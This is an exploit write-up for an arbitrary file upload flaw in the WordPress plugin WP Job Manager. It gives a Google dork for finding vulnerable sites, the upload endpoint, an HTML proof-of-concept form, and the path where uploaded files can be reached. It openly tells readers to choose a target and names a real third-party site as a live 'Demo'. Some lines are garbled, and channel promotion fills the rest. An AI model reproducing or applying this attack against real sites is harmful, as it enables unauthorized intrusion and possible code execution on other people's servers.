WordPress Plugins WP Job Manager - Arbitrary File Upload

1. ##################################################JokerSecurity#########################################################
2. # Title : WordPress Plugins WP Job Manager - Arbitrary File Upload
3. # Dork : inurl:/wp-content/plugins/wp-job-manager/
4. # Tested on: [ BlackBuntu ]
5. # MyChannel Youtube : https://www.youtube.com/channel/UCPRRAzu8dMWxChn-RruC-eg/videos
6. # Myblog : http://kader-information.blogspot.com/
7. ######################
8. # [+] DESCRIPTION :
9. ######################
10.  
11. # 1: Search Google Dork and Choose a Target
12.  
13. #2 Exploit :
14. ========
15. https://localhost/jm-ajax/upload_file/
16. Vulnerability :
17. =======
18. FormCraft {"files":[]}
19.  
20. 3 PoC :
21. ====
22. <form method="POST" action="https://localhost/jm-ajax/upload_file/" enctype="multipart/form-data">
23. <input type="file" name="files[]" />
24. <button>Upload!</button><br/>
25. </form>
26.  
27. 4 : Upload Your File -=-=-=-=-=- File.jpg
28.  
29. 5 : File Access : https://localhost/wp-content/uploads/job-manager-uploads/files/YYYY/MM/your-files.jpg
30.  
31. ######
32. Demo :
33. ######
34. http://snuviktechnologies.com
35.  
36. ######################
37.  
38. subscribe for my channel and page in facebook
39.  
40. # Website : http://dev-labs.co
41.  
42. # My Blogger : http://kader-information.blogspot.com/
43.  
44. # Page FacebOOk 1 : https://www.facebook.com/AnonymousPalestine.vip
45.  
46. # Page Facebook 2 : http://facebook.com/kali.linux.pentesting.tutorials/
47.  
48.  
49. By <3
50.  
51. ##################################################JokerSecurity#########################################################